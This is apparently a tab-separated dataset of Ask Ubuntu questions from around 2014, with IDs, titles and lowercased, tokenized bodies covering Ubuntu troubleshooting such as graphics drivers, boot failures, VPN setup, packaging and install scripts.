500829	ca n't detect external monitor on thinkpad w530 running ubuntu 14.04	i have a thinkpad w530 running ubuntu 14.04 ; i 've tried connecting external monitors via both vga and displayport , but neither are being detected . i turned off optimus , and am only using the discrete graphics card ( an nvidia quadro k1000m ) . i 'm using the `` recommended proprietary driver '' ( according to system tools - > preferences - > additional drivers ) : nvidia binary driver - version 331.38 from nvidia-331 ( proprietary , tested ) . i 've also tried the nvidia-current package , which i think is version 304 , but it 's not working either . lshw -c video gives *-display unclaimed description : vga compatible controller product : gk107glm [ quadro k1000m ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list configuration : latency=0 resources : memory : f2000000-f2ffffff memory : e0000000-efffffff memory : f0000000-f1ffffff ioport:5000 ( size=128 ) memory : f3080000-f30fffff the `` unclaimed '' thing is weird , since the laptop display is working fine ( and with the correct resolution and all ) . strangely , nvidia-settings gives me a window that looks significantly different from what is claimed at the ubuntu help page , which shows detected x screens on the left : instead , i see which seems a lot less helpful .
500830	where does lightdm change $ path	i use lightdm on my ubuntu 12.04 and i have the entry /usr/lib/lightdm/lightdm in my $ path if i login through lightdm . now i 'm cleaning my $ path and i simply want to know where this entry gets added . this entry does n't appear if i login via terminal .
500831	screencam that records sound ( 2014 )	it 's 2014 . what 's the best tool for recording a session on my computer that includes internal audio ?
500832	workaround for pcmanfm `` module directory not accessible ''	environment : ubuntu 14.04 + openbox . all udates/upgrades applied . when i run pcmanfm , i get an error `` modules directory is not accessible . '' browsing the net , it appears a bug was filed and a fix is already in the source code . however , i don ' want to download and build the source code on my machine . i would prefer waiting for the upgrade to be available in the standard ubuntu repository . meanwhile , i am wondering if there is any workaround that i can use . perhaps i could manually create the directory it is looking for . regards , peter
500833	ubuntu 14.04 constantly reboots	i have upgraded to ubuntu 14.04 from ubuntu 12.04 and i have encountered a very annoying problem . eversince i installed this last version , my laptop has entered a cycle of reboots over and over again every few minutes . also i 'm having problems with the display , which does n't load correctly in some of these reboots ( surprisingly , only some of them , after which it fixes alone ) . i upgraded ubuntu by downloading the last version from the ubuntu official webpage and setting it as a usb stick . first i tried it , and after that i decided to install it , despite this issue was already happening . i did n't pay much attention to this issue then because i thought it was caused by the fact i was using a usb stick , and not the standard installation . i thought that because i had a previous experience with ubuntu 14.04 on virtualbox in ubuntu 12.04 , and i encountered no problem ( besides it was a bit slow , as expected on a virtual machine ) . unfortunately , i removed the former 12.04 installation , but i already have windows 7 as a dual boot . thank you for taking the time to read this . english is not my mother tongue , so i 'm sorry for possible mistakes i might have committed . also , i am a basic user and i guess it 's possible that more information is needed , but i do n't know anymore relevant information . of course i will try to provide any i am asked about .
500837	search for a library in software center	i search a library called pango in 12.04 software center , but it returns nothing . but if i search for libpango , it will returns libpango1.0-dev . i wonder how to search for a library in a correct way in the software center ? what if in command line ? thanks .
500838	how to use /lib/firmware/ar9710.fw with wn111v1 wireless adapter in ubuntu 12.04 ?	today i was delighted to find a file named ar9710.fw in my ubuntu 12.04 computer 's /lib/firmware/ directory . it 's supposed to be for the wn111v2 wireless adapter . since i am totally new to this subject , i 'll appreciate receiving any advice or information on this matter . even a simple example will be a great help to me . i am familiar with ndiswrapper and think using linux firmware may even be better . julianloui
500840	what is a hostname	im trying to set up a ftp server and the turtorial im following says to change the `` server name to your hostname '' - what is a hostname and how do i find it ? thanks !
500843	create a clickable install script for software	i want to create a simple script that a user can download , click on , and it will : request their root password through some sort of pop-up interface then sudo apt-get install a package to their computer and finally , run a few other commands to configure said software . i know all the necessary bash in order to install and configure the software , my problem is in getting it to run with a single click . ( sort of like a windows .exe installer ) . how might this be accomplished ?
500846	i ca n't boot into windows : error : unknown command 'drivemap ' ; invalid efi file path	i had windows 8.1 alongside ubuntu and all worked well . after a problem with my video configs i decided to unistall ubuntu and i made a fatal mistake : deleted the linux partition . after that i could n't boot into windows . so , i decided reinstall ubuntu at the same partition used before . but until now i 'm unable to use the microsoft os . after trying any several ways to solve the problem , i installed boot-repair and get this error : unknown command 'drivemap' invalid efi file path here is the boot-repair log file : http : //paste.ubuntu.com/7832988/ my computer is an asus vivobook i7 64bits . can someone help me ?
500848	error to connect to a pptp vpn from ubuntu server 12.04.2 lts	i need to connect to a vpn from command line because i 'm on ubuntu sever 12.04.2 lts without no gui . if i give this command to connect to my vpn : sudo pon vpnguido nodetach i receive this error : using interface ppp0 connect : ppp0 < -- > /dev/pts/1 lcp : timeout sending config-requests connection terminated . modem hangup in /etc/ppp/peers/vpnguido i have : pty `` pptp ipserver -- nolaunchpppd '' name bart remotename vpnguido require-mppe-128 file /etc/ppp/options.pptp ipparam ipserver and i have also configured /etc/ppp/chap-secrets with : bart vpnguido mypassword where is the problem ? the pptp server work fine because from macos i can access to it .
500849	what information is transferred if i copy-paste an image from a graphics software ?	if i copy a certain vector or `` curve '' graphic or drawing from , say , gimp to a blank page of inkscape , then in the meanwhile , what information is stored in the clipboard ?
500853	running a python scrip using startup	i am trying to get a simple python code that i have to run in the background at startup , and stay running . the best option that i have found so far is to use upstart . i wrote the following .conf file in the /etc/init/ folder and the service comes up with the initctl list command however when i start the service and then check the list again it is not running . the .conf is below . if somebody could help me that would be much appreciated start on runlevel [ 2345 ] stop on runlevel [ 016 ] respawn script exec python /some/directory/python_code.py end script
500855	wirless card not working	i am not able to use my wireless card . when i click the wireless icon ( which one ? ) no wireless networks are visible ! my wireless card is a linksys , wireless g 2.4ghz pci adapter model no . : wmp54g .
500856	arista transcode turns subtitle to gibberish	this has recently happened to me . in arista transcode 0.9.7 on ubuntu 12.04 the burnt subtitle ( a persian .srt encoded in utf8 ) turns into gibberish after a few minutes . i have tried different video formats but none worked with arista . when i burn the srt file into video using mencoder command , it burns correctly . so i suspect something is wrong with arista . any help to fix this arista problem is appreciated .
500858	stuck on the same updates ; apt-get update does n't seem to help	for the past few days , i 've logged onto my server and seen 9 packages can be updated . so i sudo apt-get update . if i log out and right back in , i will once again see 9 packages can be updated . this has been going on for a few days . how would i go about fixing it ?
500864	upgrade manager asks for 14.04 cd	i am running ubuntu 12.04 lts but i get a request for the trusty tahr cd when it offers new cups software . i have not upgraded yet . i have made myself a cd , but i find the request odd . is 14.04 upgrading gradually ?
500867	ubuntu 14.04 ar8161 ethernet dropping out	i am having a problem with ubuntu 14.04 and the atheros ar8161 . i can connect to the ethernet port fine and be connected to the internet , but the connection drops out sometimes , such as after an hour or two of running . this did n't happen on older version of ubuntu ( 12.04 )
500870	looking for a countdown app where i can set value in days	looking for countdown app where i can set value in days . there 're apps that allow to set hrs : mins : secs , but i want to set in days . for example , windows 7 has this sort of countdown app .
500871	checking for dependencies when creating a .deb	i 'm working my way through the documentation on how to build a .deb package and i 've hit something of a snag . when i need to spell out the dependencies for the package ( dillo right now , just for a trial run ) , i enter in dpkg-depcheck -d ./configure . the documentation , found here , says that the result should be a nice little list of packages , like so : packages needed : libc6-i686 libldap-2.4-2 libsasl2-2 libtasn1-3 yasm libgpg-error0 libgcrypt11 libkeyutils1 libidn11 libgnutls26 libk5crypto3 locales libcurl3-gnutls libkrb5support0 libkrb5-3 libgssapi-krb5-2 gawk however i get the following monstrosity : sam @ bitey0desktop : ~/temporary/debtest/dillo-3.0.4 $ dpkg-depcheck -d ./configure checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu checking target system type ... x86_64-unknown-linux-gnu checking for a bsd-compatible install ... /usr/bin/install -c checking whether build environment is sane ... yes checking for a thread-safe mkdir -p ... /bin/mkdir -p checking for gawk ... gawk checking whether make sets $ ( make ) ... yes checking whether make supports nested variables ... yes checking for gcc ... gcc checking whether the c compiler works ... yes checking for c compiler default output file name ... a.out checking for suffix of executables ... checking whether we are cross compiling ... no checking for suffix of object files ... o checking whether we are using the gnu c compiler ... yes checking whether gcc accepts -g ... yes checking for gcc option to accept iso c89 ... none needed checking whether gcc understands -c and -o together ... yes checking for style of include used by make ... gnu checking dependency style of gcc ... gcc3 checking for g++ ... g++ checking whether we are using the gnu c++ compiler ... yes checking whether g++ accepts -g ... yes checking dependency style of g++ ... gcc3 checking for ranlib ... ranlib checking how to run the c preprocessor ... gcc -e checking for grep that handles long lines and -e ... /bin/grep checking for egrep ... /bin/grep -e checking for ansi c header files ... yes checking for sys/types.h ... yes checking for sys/stat.h ... yes checking for stdlib.h ... yes checking for string.h ... yes checking for memory.h ... yes checking for strings.h ... yes checking for inttypes.h ... yes checking for stdint.h ... yes checking for unistd.h ... yes checking size of char ... 1 checking size of short ... 2 checking size of long ... 8 checking size of int ... 4 checking size of void * ... 8 checking for int16_t ... yes checking for uint16_t ... yes checking for int32_t ... yes checking for uint32_t ... yes checking for gethostbyname ... yes checking for setsockopt ... yes checking for socklen_t ... socklen_t checking fltk 1.3 ... no configure : error : fltk 1.3 required ; fltk-config not found running strace failed ( command line : strace -e trace=open , execve -f -q -o /tmp/depchcrkaql ./configure i 'm thinking the errors at the bottom have something to do with it but i have n't found a way to resolve them .
500872	black screen with text after upgrading ubuntu from 12.04 to 14.04 lts	i thought that i could ask this since i have n't seen anything related to my problem . i tried to upgrade ubuntu from 12.04 to 14.04 using this method [ http : //www.omgubuntu.co.uk/2014/04/upgrade-ubuntu-14-04-12-04 ] . ubuntu downloaded everything and installed . when the system asked to be restarted , i clicked the button . the system boots up again and then , i get a black screen with this text : mount : mounting /dev/loopv on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem does n't have requested /sbin/init . no init found . try passing init= bootarg . busybox v1.21.1 ( ubuntu 1:1.21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ i dunno what it means , i dunno if ubuntu 14.04 installed properly or not . or , if i have to put some code there to make ubuntu work again . but that 's it . how can i make ubuntu work again ? is it possible from this black screen ? thanks guys for any help !
500876	ubuntu 12.04 live cd not booting on imac g5 ( intel )	my imac g5 isnt booting the ubuntu 12.04 live cd ( 32 bit version ) . when i press the up key , the last line is `` * starting bluetooth daemon '' . it does not have the [ ok ] next to it . if i dont press the up , the animation eventually freezes and the ubuntu logo and dots just hang on the screen . is there anyway i can skip the bluetooth daemon ? or any other solutions ? thanks in advance guys ! i can provide any more information if you need it
500881	how to download gta san andreas on ubuntu 12.04 ?	i wan na a download link of grand theft auto san andreas version linux ubuntu 12.04 please anyone give me a download link of mta san andres and gta san andreas version linux ubuntu 12.04
500882	can dvd be used after it stuck at 100 % creating image checksum when burning ?	i 've a dvd+r ( btw , i do n't know why i ca n't add files to it and it 's +r and not -r ) and i tried to burn windows starter on it ( i need it for something ) , but the problem is that burning stuck at 100 % creating image checksum . so i rebooted the system ( from terminal ) . now , can this dvd be used to install windows starter without problems ? and can i know if a dvd is missing a file or a system will have problems when installed ?
500884	intel gpu monitor and overclocking	i have an intel haswell i7 with hd 4800 graphics . i 'm wondering what tools are available for me to monitor and tweak my gpu . i 'm looking for something like nvidia settings if there is anything like that available for intel . i 'm already using the xorg edgers drivers .
500886	check user input is alpha numeric	hi im not any sort of programmer but found myself creating an install script which installs mysql which works fine . i would like to improve the script by asking the user to enter text that will be used for a password . my understanding is that a reasonable way of doing this would be to use the 'echo ' and 'read ' commands to obtain their input and then i would like to check that only standard alpha numeric characters are used and if not ask the user to try again . i have not been able to understanding grep or piping so am asking if anyone would be willing to write it in a way that i might just drop it into a bash script . hoping ns
500892	why is my home size decreasing ?	i am using 32-bit ubuntu 12.04 . my laptop is thinkpad t400 . as system monitor shows , `` free '' for my $ home is 1.5gib , but `` available '' is ranging between 0 and 97 mib . my hardrive is constantly being read and written , to release more space , and at the same time slows down my system . my 4gb swap has n't been used yet , while my 8gb ram usage is a little less than 50 % . i set my firefox web content cache to be 50mb , and free it manually from time to time . how can i find out the reason that causes that , e.g. , is there some running application that is using the space of $ home as temporary storage place and therefore can be freed up ? which directory or file is increasing its size the most/fast ? thanks .
500895	asus pro p550ca trackpad unresponsive , cursor moving leftwards every 20 seconds	well i have finally decided to start fresh and move from using mac to using ubuntu and i have bought the following computer to begin my linux journey with : asus pro p550ca-xo330d i have successfully install ubuntu now and it appears that everything is working except the trackpad , and even when only using a usb mouse , there is the problem that the mouse often does not actually click on what is underneath it and the cursor moves to the left about every 20 seconds . the trackpad itself is about 95 percent unresponsive . i think maybe for an advanced linux user this may not seem like much of a problem , but as a beginner i honestly could not have a clue where to start to have this sort of problem fixed . i have installed ubuntu 14.0 and installed all the available software updates as of july 21st 2014 . all hints are greatly appreciated . thanks
500896	centos lxc on ubuntu 12.04	i am trying to use centos 6.5 lxc on ubuntu 12.04 , but i have problems with installing rpm package on centos . here 's the error : [ root @ pgr ~ ] # rpm -ivh http : //pkgs.repoforge.org/rpmforge-release/rpmforge-rele ase-0.5.3-1.el6.rf.i686.rpm retrieving http : //pkgs.repoforge.org/rpmforge-release/rpmforge-release-0.5.3-1.el6.rf.i686.rpm error : failed dependencies : /bin/sh is needed by rpmforge-release-0.5.3-1.el6.rf.i686 i searched for the cause but i could n't find it . can anyone help solve this ? i think that the one of the causes is that rpm does n't work on ubuntu , but i do n't know how to solve it .
500897	some of my cursor icons are gone	i recently did a full reinstall of ubuntu and then did a reinstall of gnome ( useing this guide http : //www.omgubuntu.co.uk/2013/12/upgrade-gnome-3-10-ubuntu-13-10 ) but some of my cursors are missing . for example i used to get a corsshairs cursor when useing the area capture in gnome-screenshot , now it 's just the normal mouse . does anyone know how to get these back ?
500901	ubuntu 14.04 edit the top right panels ?	i want to people able to change the icons in the top right panel , by the time . i have tried unity tweak tool , that only goes so far , and it does n't cover third party icons at all . i want to remove the en thing , i think its some sort of language select or something , also i want to remove the mail icon , it was thunderbird mail , i removed it , now it 's facebook messanger . thanks ! : )
500903	why are my launcher and panel all glitchy when i open dash since updating my nvidia drivers ?	as you can see in the image , launcher and my panel look a bit glitchy when i open dash . i have used unity-tweak-tool to set the transparency to static blur on dash , and this always worked in the past . i 'm not sure what graphics drivers i was before , it was just whatever was installed by default after installing ubuntu . since updating to the nvidia binary proprietary drivers ( v331.38 ) every else has worked fine except things getting a bit glitchy when i open dash . does anyone recognize this kind of glitch ? graphics card info : 01:00.0 3d controller : nvidia corporation gf117m [ geforce 610m/710m/820m / gt 620m/625m/630m/720m ] ( rev a1 ) subsystem : asustek computer inc. geforce gt 710m flags : bus master , fast devsel , latency 0 , irq 47 memory at f6000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at e0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at f0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at e000 [ size=128 ] [ virtual ] expansion rom at f7000000 [ disabled ] [ size=512k ] capabilities : kernel driver in use : nvidia
500905	is there is another way to sync between computers ?	i try so many time for more than 1hr to create and account in ubuntu one to use only the feature sync between computers but is impossible to read the security code and always get the error wrong captcha solution . is there is another solution to sync apps between computers beside ubuntu one ? even if i have to pay for it . is so impossible to create and simple account .
500906	ubuntu unusably slow on acer aspire one	it 's a dual core atom 1.33ghz processor ( 2g ram ) . bought it with windows 7 illegally installed , but it always ran extremely slow anyway , so i wiped it and installed 14.04 . i expected it to be slow , but it 's totally unusable . like 80 seconds to open the unity search , then 10 seconds per letter when you type . some things are almost usable , but others are impossibly slow . also , browsers freeze up after about 5 minutes of use . so do most other programs . i 've disabled graphics , switched to gnome , tried to install nvidia drivers , but nothing helps . like , no difference at all . would an older version of ubuntu run faster , or am i missing something fundamental ? i ask because this page seems to indicate 12.04 is the preferred system , though maybe it 's just an old page ?
500909	kwic concordance software	i am using ubuntu trusty thar . i was searching for a kwic concordance software for indexing and concordance of a book . can any one help me in finding the software please ! ! !
500910	how to build openjfx on ubuntu 14.04 ?	i have been trying to build openjfx on ubuntu 14.04 but i 'm receiving error gradle tasks : buildsrc : clean : buildsrc : generategrammarsource : buildsrc : compilejava /home/nika/openjfx/rt/buildsrc/src/main/java/com/sun/scenario/effect/compiler/backend/sw/sse/ssebackend.java:85 : error : ' ) ' expected comparator < variable > c = ( v0 , v1 ) - > v0.getname ( ) .compareto ( v1.getname ( ) ) ; ^ /home/nika/openjfx/rt/buildsrc/src/main/java/com/sun/scenario/effect/compiler/backend/sw/sse/ssebackend.java:85 : error : ' ; ' expected comparator < variable > c = ( v0 , v1 ) - > v0.getname ( ) .compareto ( v1.getname ( ) ) ; ^ 2 errors : buildsrc : compilejava failed failure : build failed with an exception . * what went wrong : execution failed for task ' : compilejava ' . > compilation failed ; see the compiler error output for details . * try : run with -- stacktrace option to get the stack trace . run with -- info or -- debug option to get more log output . build failed total time : 5.334 secs anybody know how to build openjfx on ubuntu 14.04 ?
500911	ubuntu 14.04 not recognizing installed intel graphics driver	i 'm completely new to this . i am running ubuntu 14.04 on a new dell desktop . i am having a problem with xorg and compiz using > 60 % of a cpu . i think this is because my graphics driver is not being recognized , and so software is being used as the accelerator as opposed to the card . my card is intel xeon e3-1200 v3/4th gen core . please take a look at the output below and ask me if i am leaving out important information . i 'd be grateful for any advice . i think the telling lines are the `` not software rendered : no , '' the `` ( ee ) failed to load module `` modesetting '' ( module does not exist , 0 ) , '' and the `` aiglx : screen 0 is not dri2 capable ; aiglx : reverting to software rendering '' are the informative lines . i have updated the intel driver . uname -a linux xxx 3.13.0-32-generic # 57-ubuntu smp tue jul 15 03:51:08 utc 2014 x86_64 x86_64 x86_64 gnu/linux lshw -c video *-display unclaimed description : vga compatible controller product : xeon e3-1200 v3/4th gen core processor integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 06 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list configuration : latency=0 resources : memory : f7800000-f7bfffff memory : e0000000-efffffff ioport : f000 ( size=64 ) output of : /usr/lib/nux/unity_support_test -p opengl vendor string : vmware , inc. opengl renderer string : gallium 0.4 on llvmpipe ( llvm 3.4 , 256 bits ) opengl version string : 2.1 mesa 10.1.3 not software rendered : no not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no relevant portions of my xorg.0.log : [ 10.871 ] loading extension glx [ 10.871 ] ( == ) matched intel as autoconfigured driver 0 [ 10.871 ] ( == ) matched modesetting as autoconfigured driver 1 [ 10.871 ] ( == ) matched fbdev as autoconfigured driver 2 [ 10.871 ] ( == ) matched vesa as autoconfigured driver 3 [ 10.871 ] ( == ) assigned the driver to the xf86configlayout [ 10.871 ] ( ii ) loadmodule : `` intel '' [ 10.871 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 10.873 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 10.873 ] compiled for 1.15.0 , module version = 2.99.910 [ 10.873 ] module class : x.org video driver [ 10.873 ] abi class : x.org video driver , version 15.0 [ 10.873 ] ( ii ) loadmodule : `` modesetting '' [ 10.873 ] ( ww ) warning , could n't open module modesetting [ 10.873 ] ( ii ) unloadmodule : `` modesetting '' [ 10.873 ] ( ii ) unloading modesetting [ 10.873 ] ( ee ) failed to load module `` modesetting '' ( module does not exist , 0 ) [ 10.873 ] ( ii ) loadmodule : `` fbdev '' [ 10.873 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 10.873 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 10.873 ] compiled for 1.15.0 , module version = 0.4.4 [ 10.873 ] module class : x.org video driver [ 10.873 ] abi class : x.org video driver , version 15.0 [ 10.873 ] ( ii ) loadmodule : `` vesa '' [ 10.873 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 10.873 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 10.873 ] compiled for 1.15.0 , module version = 2.3.3 [ 10.873 ] module class : x.org video driver [ 10.873 ] abi class : x.org video driver , version 15.0 [ 10.873 ] ( == ) matched intel as autoconfigured driver 0 [ 10.873 ] ( == ) matched modesetting as autoconfigured driver 1 [ 10.873 ] ( == ) matched fbdev as autoconfigured driver 2 [ 10.873 ] ( == ) matched vesa as autoconfigured driver 3 [ 10.873 ] ( == ) assigned the driver to the xf86configlayout [ 10.873 ] ( ii ) loadmodule : `` intel '' [ 10.874 ] ( ii ) loading /usr/lib/xorg/modules/drivers/intel_drv.so [ 10.874 ] ( ii ) module intel : vendor= '' x.org foundation '' [ 10.874 ] compiled for 1.15.0 , module version = 2.99.910 [ 10.874 ] module class : x.org video driver [ 10.874 ] abi class : x.org video driver , version 15.0 [ 10.874 ] ( ii ) unloadmodule : `` intel '' [ 10.874 ] ( ii ) unloading intel [ 10.874 ] ( ii ) failed to load module `` intel '' ( already loaded , 32548 ) [ 10.874 ] ( ii ) loadmodule : `` modesetting '' [ 10.874 ] ( ww ) warning , could n't open module modesetting [ 10.874 ] ( ii ) unloadmodule : `` modesetting '' [ 10.874 ] ( ii ) unloading modesetting [ 10.874 ] ( ee ) failed to load module `` modesetting '' ( module does not exist , 0 ) [ 10.874 ] ( ii ) loadmodule : `` fbdev '' [ 10.874 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 10.874 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 10.874 ] compiled for 1.15.0 , module version = 0.4.4 [ 10.874 ] module class : x.org video driver [ 10.874 ] abi class : x.org video driver , version 15.0 [ 10.874 ] ( ii ) unloadmodule : `` fbdev '' [ 10.874 ] ( ii ) unloading fbdev [ 10.874 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 10.874 ] ( ii ) loadmodule : `` vesa '' [ 10.874 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 10.874 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 10.874 ] compiled for 1.15.0 , module version = 2.3.3 [ 10.874 ] module class : x.org video driver [ 10.874 ] abi class : x.org video driver , version 15.0 [ 10.874 ] ( ii ) unloadmodule : `` vesa '' [ 10.874 ] ( ii ) unloading vesa [ 10.874 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 10.874 ] ( ii ) intel : driver for intel ( r ) integrated graphics chipsets : i810 , i810-dc100 , i810e , i815 , i830m , 845g , 854 , 852gm/855gm , 865g , 915g , e7221 ( i915 ) , 915gm , 945g , 945gm , 945gme , pineview gm , pineview g , 965g , g35 , 965q , 946gz , 965gm , 965gme/gle , g33 , q35 , q33 , gm45 , 4 series , g45/g43 , q45/q43 , g41 , b43 [ 10.875 ] ( ii ) intel : driver for intel ( r ) hd graphics : 2000-5000 [ 10.875 ] ( ii ) intel : driver for intel ( r ) iris ( tm ) graphics : 5100 [ 10.875 ] ( ii ) intel : driver for intel ( r ) iris ( tm ) pro graphics : 5200 [ 10.875 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 10.875 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 10.875 ] ( ++ ) using vt number 7 [ 10.881 ] ( ii ) loading sub module `` fbdevhw '' [ 10.881 ] ( ii ) loadmodule : `` fbdevhw '' [ 10.881 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 10.881 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 10.881 ] compiled for 1.15.1 , module version = 0.0.2 [ 10.881 ] abi class : x.org video driver , version 15.0 [ 10.881 ] ( ** ) fbdev ( 0 ) : claimed pci slot 0 @ 0:2:0 [ 10.881 ] ( ii ) fbdev ( 0 ) : using default device [ 10.881 ] ( ww ) falling back to old probe method for vesa [ 10.881 ] ( ii ) fbdev ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 10.881 ] ( == ) fbdev ( 0 ) : depth 24 , ( == ) framebuffer bpp 32 [ 10.881 ] ( == ) fbdev ( 0 ) : rgb weight 888 [ 10.881 ] ( == ) fbdev ( 0 ) : default visual is truecolor [ 10.881 ] ( == ) fbdev ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 10.881 ] ( ii ) fbdev ( 0 ) : hardware : vesa vga ( video memory : 9024kb ) [ 10.881 ] ( ii ) fbdev ( 0 ) : checking modes against framebuffer device ... [ 10.881 ] ( ii ) fbdev ( 0 ) : checking modes against monitor ... [ 10.881 ] ( -- ) fbdev ( 0 ) : virtual size is 1920x1200 ( pitch 1920 ) [ 10.881 ] ( ** ) fbdev ( 0 ) : built-in mode `` current '' : 230.4 mhz , 94.7 khz , 77.4 hz [ 10.881 ] ( ii ) fbdev ( 0 ) : modeline `` current '' x0.0 230.41 1920 1952 2192 2432 1200 1204 1208 1224 -hsync -vsync -csync ( 94.7 khz b ) [ 10.881 ] ( == ) fbdev ( 0 ) : dpi set to ( 96 , 96 ) [ 10.881 ] ( ii ) loading sub module `` fb '' [ 10.881 ] ( ii ) loadmodule : `` fb '' [ 10.881 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 10.881 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 10.881 ] compiled for 1.15.1 , module version = 1.0.0 [ 10.881 ] abi class : x.org ansi c emulation , version 0.4 [ 10.881 ] ( ** ) fbdev ( 0 ) : using shadow framebuffer [ 10.881 ] ( ii ) loading sub module `` shadow '' [ 10.881 ] ( ii ) loadmodule : `` shadow '' [ 10.881 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 10.881 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 10.881 ] compiled for 1.15.1 , module version = 1.1.0 [ 10.881 ] abi class : x.org ansi c emulation , version 0.4 [ 10.881 ] ( ii ) unloadmodule : `` vesa '' [ 10.881 ] ( ii ) unloading vesa [ 10.881 ] ( == ) depth 24 pixmap format is 32 bpp [ 10.881 ] ( ee ) fbdev ( 0 ) : fbioblank : invalid argument [ 10.881 ] ( == ) fbdev ( 0 ) : backing store enabled [ 10.882 ] ( == ) fbdev ( 0 ) : dpms enabled [ 10.882 ] ( == ) randr enabled [ 10.884 ] ( ii ) selinux : disabled on system [ 10.885 ] ( ii ) aiglx : screen 0 is not dri2 capable [ 10.885 ] ( ee ) aiglx : reverting to software rendering [ 10.903 ] ( ii ) aiglx : loaded and initialized swrast [ 10.903 ] ( ii ) glx : initialized driswrast gl provider for screen 0 tuesday update : this issue continues . other anomalies i 've noted that might be related : my monitor is detected as a `` built in display '' and the resolution can not be changed . i figure this must be related . ( i have an external monitor . ) output of xrandr -- verbose : xrandr : failed to get size of gamma for output default screen 0 : minimum 1920 x 1200 , current 1920 x 1200 , maximum 1920 x 1200 default connected primary 1920x1200+0+0 ( 0x17f ) normal ( normal ) 0mm x 0mm identifier : 0x17e timestamp : 173701 subpixel : unknown clones : crtc : 0 crtcs : 0 transform : 1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000 filter : 1920x1200 ( 0x17f ) 177.4mhz *current h : width 1920 start 0 end 0 total 1920 skew 0 clock 92.4khz v : height 1200 start 0 end 0 total 1200 clock 77.0hz wednesday update : i found a `` driver device manager '' tool of intel . installed it . it properly lists my graphics hardware as intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller , but the activated driver is the frambuffer display driver ( fbdev ) . it gives me the option to , instead , activate the intel driver ( version 2:2.99:910-0ubuntu1 ) with `` recommended '' in the description . that 's all fine and dandy . checked `` activate '' for the correct driver . it requested a computer restart . said sure and restarted ... .. no dice . same result . reverting to gallium 0.4 . any thoughts ? where is my problem ? is it in the hardware , or in the driver , or somewhere in some other ubuntu file ?
500915	explain on how to setup a jbod ubuntu server ?	i have 3 hard drives . two hard drives are sata and one is ide . c : \ - 300 gb sata hard drive d : \ - 80 gb ide hard drive . and third disk is not installed , assume as if it was . how do i merge all three disk to use them as a single one ? explain me how to setup a jbod setup please . or how i can achieve what i want . running ubuntu server 14.04 on a pc . just to make sure , i want to use all hard drives for the server as a single volume . i use this server just to play around , and use it as a web server . just a testing environment , i 'm building it from spare parts i find on my house .
500916	setting hostname on startup	our lab group just purchased a dozen or so new workstations . they 're dells , so perhaps conveniently they report their service tag with dmidecode -s system-serial-number . we 're thinking of using clonezilla to easily deploy images across them all , but they each need to be set with a specific hostname and static ip address . so , combining the two seems straightforward using a lookup something like : declare -a tags tags= ( [ `` hkx321k '' ] = '' ws1name 10.32.54.10 '' [ `` hbz321g '' ] = '' ws2name 10.32.54.11 '' ) tag= $ ( sudo dmidecode -s system-serial-number ) read -a nameip < < < `` $ { tags [ $ tag ] } '' wsname= $ { nameip [ 0 ] } wsip= $ { nameip [ 1 ] } sed or the like could then make a /etc/hosts , hostname , and network/interfaces files from some templates . however , is modifying those files sufficient , and how do i execute the `` personalization '' script very early in boot before ubuntu starts setting stuff up ? is my plan bad for another unforeseen reason ; what hidden pitfalls might await ?
500918	installation ubuntu 14.04	i am a new ubuntu user . i installed ubuntu 14.04 on my laptop 's hard drive which was completely empty without partitions . when installing i could not define partitions or by selecting options that indicates that it does allow partitions . the installation finished and it used the entire disk . i tried to change the partition using gparted , but it did n't permit me to do it . i tried to use 'kde partition manager ' and i could n't use it either because i did n't have administrative permissions . can someone tell me what to do ? how to uninstall ubuntu ? or how to modify a partition ? and how can i get administrative permissions in ubuntu ? after ubuntu is running ok , i intend to use virtualbox to install windows 7 .
500919	what is the difference between terminal and text console ?	please help me with this about the differences of the text console and terminal . how is they different and what are their differences . i like to use ubuntu by terminal but i know barely all its commands so how can i get them all
